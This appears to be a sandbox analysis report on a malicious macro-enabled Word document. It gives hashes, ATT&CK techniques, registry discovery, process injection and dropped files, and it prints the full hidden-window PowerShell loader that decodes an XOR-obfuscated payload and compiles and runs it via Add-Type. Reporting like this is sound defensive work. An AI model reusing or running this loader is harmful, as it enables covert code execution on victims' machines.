ecdf26dffbf572bde7ae3b7fbc4f92e958dcf41f047a8af086e131173c49090d

Analysis

max time kernel
136s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-11-2024 12:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2020-01-09_174205.docm
Size

164KB
MD5

da314846063cf72c4aa800c4d6a88f8f
SHA1

a01a8905965d59f896968958f9b39115420a636b
SHA256

068f7e67f52d97eef2929a08dad735e85dc91bebc2e14b794cb670f915a1074b
SHA512

62102482e1206317abb4bd3adefcb3134d0d9133c10ac988990e6ebead2b4dee30e2374a0635f07850206d813cce22d412b316ac6b246f7a330ccbebf5ecc15a
SSDEEP

3072:0UgwWw+CnDOLnT0dRGLvkD4Q74N6GO2FMgZ4E56VvdvbFcZ:CHMDy0UkDL4MGO2n5y6

Score

10^/10

execution

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4916	716	powershell.exe	83

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4916	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
716	WINWORD.EXE
716	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4916	powershell.exe
4916	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4916	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
716	WINWORD.EXE
716	WINWORD.EXE
716	WINWORD.EXE
716	WINWORD.EXE
716	WINWORD.EXE
716	WINWORD.EXE
716	WINWORD.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 716 wrote to memory of 4916	716	WINWORD.EXE	90
PID 716 wrote to memory of 4916	716	WINWORD.EXE	90
PID 4916 wrote to memory of 3448	4916	powershell.exe	93
PID 4916 wrote to memory of 3448	4916	powershell.exe	93
PID 3448 wrote to memory of 3432	3448	csc.exe	94
PID 3448 wrote to memory of 3432	3448	csc.exe	94

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2020-01-09_174205.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle Hidden function re7db1a {param($p58848)$z325bc='d795b';$z3fb8f='';for ($i=0; $i -lt $p58848.length;$i+=2){$m386b1c=[convert]::ToByte($p58848.Substring($i,2),16);$z3fb8f+=[char]($m386b1c -bxor $z325bc[($i/2)%$z325bc.length]);}return $z3fb8f;} $lb6b45 = '1144505b054464404616015a0240110d595e15311d444d500f4a654c5b160d5a5c1b2b0a435c470d14645c47140d545c46591144505b054464404616015a17710b0550575a11105e5a46591144505b054464404616015a177c2d5f424a5c0c03176a4c111052541b2c014302386814425b590b07175a59031744195d040703080c193f7355592b09475647164c155250100a52550650461b7c5b16164e695a0b0a43041725014369470d07765d511001444a174b3917494000085e5a151110564d5c0144524141071659197c0c10674d47421e05005355501f705b1634434b150e01555f505048444d470b0a501950570105081c593f7355592b09475647164c155250100a52550650461b19700c104540650d0d594d155f4415755a03007b505710054540174b3917494000085e5a151110564d5c0144524141071659197c0c10674d4742030e5a0704051f4a41100d595e15100600005656011e026e26085b7058120b454d1d400f524b5b0708040b174e44725741101d67565c0c100a1b630b16434c540e344556410707431b1c3f44474c570e0d541946160543505642014f4d50100a175b5a0d081741515a5306117c0c10674d474203040a07534862705b1634434b151102550d0d5a561b19400b0a4319580157050119420b424d15170d594d1501010f000d4b5f6c7d590e2d5a495a10101f1b7e0716595c595156195d590e461b19700c104540650d0d594d0840364355780d125274500f0b4540174e44645c412e05444d701016584b0804055b4a504b39174a4103105e5a15071c435c470c4441565c06444f5800515d1f705b1634434b150f570258514e2d594d651616175f5653510401190b0a43194c0653030c01504d0c494000085e5a151110564d5c01445e57414209060c04565655111c192d594d6516161755025b0504190842030e5a0704051f4b5055005508544a46070c000350560c5656070709000051021b1c4b5f5e5f1d0e530e58065f597e5741321045176f071658104e050b4356150a010f5a06075d0c447c0c10674d474217015802505604044f505d510e014a080000545148455c02060606581d4056020c545605025a065354000c035753000e045554050c045707030e174b4d0c50534a1701580250560404082b0a436941104a6d5c470d4d4c5e5a160b1751505a07045c0c591962705b1634434b150106025f015f4c62705b1634434b1c575f42505b164443580357570a090e0b021f184d065c00081d1152560e0750571b5a5757020315051a5007155a1710174d54545104101c1903584d5a420c52015651010e0248201d435c6e3f44440e5357000a42051a570615051a025115051a5d07440e2b0a4369411044470a5356050a745410175f58594c255b555a012c70555a00055b11064b5f7a5847110c56551b210b47401d1153510c514e541b490604505615064b5f4f5800515d1f575015447e574132104511465405000b07514a63567c0c10010d1d4b4f07410552555510191257510d544e571e025d075c540a505b5e176e5000275b50500c10174b5600505600080c01401962070674555c070a43111c5917434b5c0c031751535755560d08270a4150470d0a5a5c5b164a705c41240b5b5d501034564d5d4a21594f5c100b5954500c10196a4507075e5859240b5b5d50104a7649450e0d5458410b0b597d5416051e12173e384501505153561b1e1001005d5753051f1b010351050d04575415100e1007550d545b4a7356420c08585851240d5b5c1d1001005d5753051f1b050150040d51565102010100550f0c505653070e055454010957530607080550550f0c515656075f010351050d0457541510190a02020854564d0c69470d07524a463110564b412b0a5156151301015a005b500a57501544674b5a0101444a661605454d7c0c0258115d04510658014b5f674b5a0101444a1b3110564b414a15520f56575d03100e1001434c470c44070248121155555c0144444d54160d54194616165e57524216520e51005556114616165e5752420f045f54075703104e111045505b05445b5c57040105041706530e0c57405f444d470b0a5019525b07055f545f37434b5c0c03197c5812104e02530d161f505b16445e0405590d0b52060405520a014c28525752160c0c501e5f561e42571b1052194f505d510e015f2758574307164317610d264e4d504a0f045f5407570317661706444d470b0a50115c4e561e1504544d0c5e0c015651581e5f4c545154104d1f43075b02000d153c445b5c57040105621d0b4b05101547445b5c570401051779070a504d5d3f4d0c44470710424b5b42030e5a0704050c4448'; $lb6b452 = re7db1a($lb6b45); Add-Type -TypeDefinition $lb6b452; [hfc419]::m15142b();
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4916
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ik3akkyf\ik3akkyf.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3448
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4C5.tmp" "c:\Users\Admin\AppData\Local\Temp\ik3akkyf\CSC9D5CA2D1A3AD48678DD86B90D6ED1A5E.TMP"
      4⤵
      PID:3432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESD4C5.tmp

Filesize
1KB

MD5
a4a061a2e1a243bb5e70f7e06b611df9

SHA1
010440fdbc4c0038d7d848e3236f3772f9f23ac8

SHA256
b41d74daa2211d629ca365f7cca0b5b4ad223367ade17576de25bf8d68a1e373

SHA512
209304ef2348b5015452b0189e07ef1a6b77c03e36f0d681573993fba7518e5aa002f578123ffb20a7c488893a8dc66ffaac4a6f56c1cf9b0517f20d94923fc2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p3awnbo4.fes.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ik3akkyf\ik3akkyf.dll

Filesize
5KB

MD5
d3e66610a58dbb4396eec473318a8e8e

SHA1
4295112efc59f0ffabd8352bdcb31cc61504b37c

SHA256
9327b31ab9789c083aa0915857b3343d2d48de06e76ba011ef91bf8e2bae510b

SHA512
6b77d502a41421d739f3fa0a694f95d5276183f486eef423ca58baf766ddc5f07127f32bd53ea4e6bd816d31cee7b37d7827af430ac07cfd1d5d094b698ecb29

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl

Filesize
245KB

MD5
f883b260a8d67082ea895c14bf56dd56

SHA1
7954565c1f243d46ad3b1e2f1baf3281451fc14b

SHA256
ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

SHA512
d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
16B

MD5
d29962abc88624befc0135579ae485ec

SHA1
e40a6458296ec6a2427bcb280572d023a9862b31

SHA256
a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

SHA512
4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ik3akkyf\CSC9D5CA2D1A3AD48678DD86B90D6ED1A5E.TMP

Filesize
652B

MD5
9eacbd84713e31c3c179617ff5a470f4

SHA1
93aab7ef6e9e1e32bd5b54008e386afaa229cf88

SHA256
bf36e167f61e120a96490e0b771ab4a07b5bbf34b9849a3885ab38917d28cf5a

SHA512
28d31c85f51e3d7448078efe4bac86f9ec4e0df5a7948289898d6125ea59cf8d6cba4bd947c2ed1ec24d816360af9143e152cfa9de2d2ec4316648a6a40219ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ik3akkyf\ik3akkyf.0.cs

Filesize
1KB

MD5
cf28846064bf71b24e9a2c354c2cc5cc

SHA1
3fdadba7d721bccf01bd298cf33274f087a22485

SHA256
a8a4b52b88e3cb6a6f35e958be9794e92027d9c939bff058ebfeaeda673c5096

SHA512
c280f7732d1bd40cb0fd144ea7140fa5e8ece8276bb4fb4c599a34821a2292216e3a21d5f122dbe1a4df208f1d4454e87b6f185d67a5269098609a840c7ecd2d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ik3akkyf\ik3akkyf.cmdline

Filesize
369B

MD5
30365aa0a2ca3391d204248d37dfa3b7

SHA1
4783e8ae9c996c9e1a9cd80c243b56f1ae1354a5

SHA256
dee7b2b1aadb7b70c2ef0acfc11587b5dda3910dd303b9766581eb7603c1a5a1

SHA512
bdba061bd2eee699fbff8fb6036e7f09443a37d295fea450093850bd967394f2e11c168b37fb8536783d3795cb419fb383b9f32ff6e40e22ff7bc95f2637b632

Download Submit
memory/716-6-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-13-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-9-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-1-0x00007FFB25730000-0x00007FFB25740000-memory.dmp

Filesize
64KB

Download
memory/716-5-0x00007FFB25730000-0x00007FFB25740000-memory.dmp

Filesize
64KB

Download
memory/716-2-0x00007FFB25730000-0x00007FFB25740000-memory.dmp

Filesize
64KB

Download
memory/716-14-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-15-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-17-0x00007FFB22ED0000-0x00007FFB22EE0000-memory.dmp

Filesize
64KB

Download
memory/716-18-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-16-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-19-0x00007FFB22ED0000-0x00007FFB22EE0000-memory.dmp

Filesize
64KB

Download
memory/716-49-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-50-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-52-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-51-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-48-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-47-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-46-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-12-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-0-0x00007FFB6574D000-0x00007FFB6574E000-memory.dmp

Filesize
4KB

Download
memory/716-11-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-10-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-8-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-7-0x00007FFB25730000-0x00007FFB25740000-memory.dmp

Filesize
64KB

Download
memory/716-4-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-104-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-3-0x00007FFB25730000-0x00007FFB25740000-memory.dmp

Filesize
64KB

Download
memory/716-92-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-93-0x00007FFB6574D000-0x00007FFB6574E000-memory.dmp

Filesize
4KB

Download
memory/716-94-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-95-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-96-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-99-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/716-103-0x00007FFB656B0000-0x00007FFB658A5000-memory.dmp

Filesize
2.0MB

Download
memory/4916-82-0x0000018CC5020000-0x0000018CC5028000-memory.dmp

Filesize
32KB

Download
memory/4916-68-0x0000018CC5180000-0x0000018CC51A2000-memory.dmp

Filesize
136KB

Download